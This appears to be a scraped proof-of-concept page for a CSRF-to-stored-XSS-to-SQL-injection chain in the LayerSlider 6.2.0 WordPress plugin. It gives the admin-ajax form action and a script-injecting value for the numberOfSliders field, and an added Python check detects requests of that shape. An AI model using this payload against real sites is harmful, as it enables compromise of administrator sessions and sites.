LayerSlider 6.2.0 CSRF -> Stored XSS -> SQL Injection



You need to be logged in with Admin privileges on the target URL, and
to have at least 1 slider for this to work.

Also you might want to allow popups.

Tested on WordPress 4.7.3


Target URL:
* Note, /wp-admin/admin-ajax.php gets appended automatically if needed

Output log

None

? means not found in the charset, _ means AJAX error.

The Form

action : ls_save_screen_options
options[numberOfSliders] : 11"> <script src=></script>
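
A defender-side check for the request shape shown in the form above, as an added example that is not part of the original PoC page or of LayerSlider's code: it flags POSTs to admin-ajax.php with this action that arrive from another origin or carry a non-integer numberOfSliders value. The function name, the placeholder site and the sample requests are constructed for illustration; treating numberOfSliders as a plain integer count is an assumption based on the field's name.

```python
from urllib.parse import parse_qs, urlsplit

AJAX_PATH = "/wp-admin/admin-ajax.php"
ACTION = "ls_save_screen_options"      # action name shown in the form above
FIELD = "options[numberOfSliders]"     # field name shown in the form above


def inspect_request(method, path, headers, body, site_origin):
    """Return a list of findings for one HTTP request (empty list = nothing flagged)."""
    if method.upper() != "POST" or urlsplit(path).path != AJAX_PATH:
        return []
    params = parse_qs(body, keep_blank_values=True)
    if ACTION not in params.get("action", []):
        return []
    findings = []
    # CSRF signal: a state-changing admin request whose Origin/Referer is another site.
    hdrs = {k.lower(): v for k, v in headers.items()}
    source = hdrs.get("origin") or hdrs.get("referer") or ""
    parts = urlsplit(source)
    origin = f"{parts.scheme}://{parts.netloc}" if parts.netloc else ""
    if origin != site_origin:
        findings.append(f"cross-site or missing origin: {origin or 'none'}")
    # Injection signal (assumption): a slider count should be a plain non-negative integer.
    for value in params.get(FIELD, []):
        if not (value.isascii() and value.isdigit()):
            findings.append(f"non-integer {FIELD}: {value!r}")
    return findings


# Constructed sample requests (not captured traffic); example.test hosts are placeholders.
SITE = "https://blog.example.test"
SAMPLES = [
    ("POST", AJAX_PATH, {"Origin": SITE},
     "action=ls_save_screen_options&options%5BnumberOfSliders%5D=25"),
    ("POST", AJAX_PATH, {"Referer": "https://other.example.test/page.html"},
     "action=ls_save_screen_options"
     "&options%5BnumberOfSliders%5D=11%22%3E+%3Cscript+src%3D%3E%3C%2Fscript%3E"),
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(inspect_request(*sample, SITE) or "ok")
```
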

Iframe for POST result

POC by